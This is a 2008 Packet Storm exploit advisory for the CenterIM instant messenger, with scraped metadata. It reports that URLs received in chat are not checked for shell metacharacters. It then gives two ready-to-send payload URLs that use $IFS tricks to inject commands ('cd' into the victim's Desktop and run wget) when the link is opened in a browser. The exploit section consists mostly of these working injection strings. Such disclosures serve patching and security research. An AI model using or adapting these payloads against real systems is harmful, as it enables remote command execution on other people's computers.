ID PACKETSTORM:64761
Type packetstorm
Reporter Brian Fonfara
Modified 2008-03-20T00:00:00
Description
`#######################################################################
Application: CenterIM
http://www.centerim.org/index.php/Main_Page
Versions: centerim <= 4.22.3
OS: Linux
Bug: Execution of shell commands
Exploit: remote
Date: 15 March 2008
Author: Brian Fonfara (w00)
eMail: brian.fonfara@gmx.de
Web: newb.kicks-ass.net
#######################################################################
1) Bug
2) Exploit
#######################################################################
=======
1) Bug
=======
Received URLs in the message window do not get checked for illegal
characters, like "\'", "\"", ";", "$", "{", "}", "&&" and "||"
#######################################################################
===========
2) Exploit
===========
Standard settings:
- Browser already open:
http://gidf.de/centerim)';cd$IFS$HOME/Desktop;wget${IFS}http://google.de;'(
- New browser instance:
http://gidf.de/centerim"&cd$IFS$HOME/Desktop;wget${IFS}http://google.de"
#######################################################################
Greets to: mrks
`
{"sourceHref": "https://packetstormsecurity.com/files/download/64761/centerim-exec.txt", "sourceData": "`####################################################################### \n \nApplication: CenterIM \nhttp://www.centerim.org/index.php/Main_Page \nVersions: centerim <= 4.22.3 \nOS: Linux \nBug: Execution of shell commands \nExploit: remote \nDate: 15 March 2008 \nAuthor: Brian Fonfara (w00) \neMail: brian.fonfara@gmx.de \nWeb: newb.kicks-ass.net \n \n \n####################################################################### \n \n1) Bug \n2) Exploit \n \n \n####################################################################### \n \n======= \n1) Bug \n======= \n \nReceived URLs in the message window do not get checked for illegal \ncharacters, like \"\\'\", \"\\\"\", \";\", \"$\", \"{\", \"}\", \"&&\" and \"||\" \n \n####################################################################### \n \n=========== \n2) Exploit \n=========== \n \nStandard settings: \n- Browser already open: \nhttp://gidf.de/centerim)';cd$IFS$HOME/Desktop;wget${IFS}http://google.de;'( \n \n- New browser instance: \nhttp://gidf.de/centerim\"&cd$IFS$HOME/Desktop;wget${IFS}http://google.de\" \n \n####################################################################### \n \nGreets to: mrks \n \n`\n", "edition": 1, "references": [], "modified": "2008-03-20T00:00:00", "hash": "d937a94504e6538fcdd637994c97d143bdccbb223c9e72ed9594eac52224c79a", "cvelist": [], "history": [], "bulletinFamily": "exploit", "href": "https://packetstormsecurity.com/files/64761/centerim-exec.txt.html", "description": "", "id": "PACKETSTORM:64761", "reporter": "Brian Fonfara", "lastseen": "2016-11-03T10:25:01", "published": "2008-03-20T00:00:00", "enchantments": {"score": {"value": -0.4, "vector": "NONE", "modified": "2016-11-03T10:25:01", "rev": 2}, "dependencies": {"references": [], "modified": "2016-11-03T10:25:01", "rev": 2}, "vulnersScore": -0.4}, "objectVersion": "1.2", "type": "packetstorm", "cvss": {"vector": "NONE", "score": 0.0}, "title": "centerim-exec.txt", "viewCount": 1, "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "d4be9c4fc84262b4f39f89565918568f", "key": "cvss"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "description"}, {"hash": "8b6e2ea4f561a8f64b93cee830f7e373", "key": "href"}, {"hash": "2f073411a4124b00bebd851c292667e9", "key": "modified"}, {"hash": "56765472680401499c79732468ba4340", "key": "objectVersion"}, {"hash": "2f073411a4124b00bebd851c292667e9", "key": "published"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "817bacb908e17444737ed2abf41b5002", "key": "reporter"}, {"hash": "c568e143c8755381939985f4702e16b6", "key": "sourceData"}, {"hash": "9c2a97b909b011d8e2f01611ceb3abb8", "key": "sourceHref"}, {"hash": "7fbe712343142409a1acd397ac104a76", "key": "title"}, {"hash": "6466ca3735f647eeaed965d9e71bd35d", "key": "type"}]}
{}
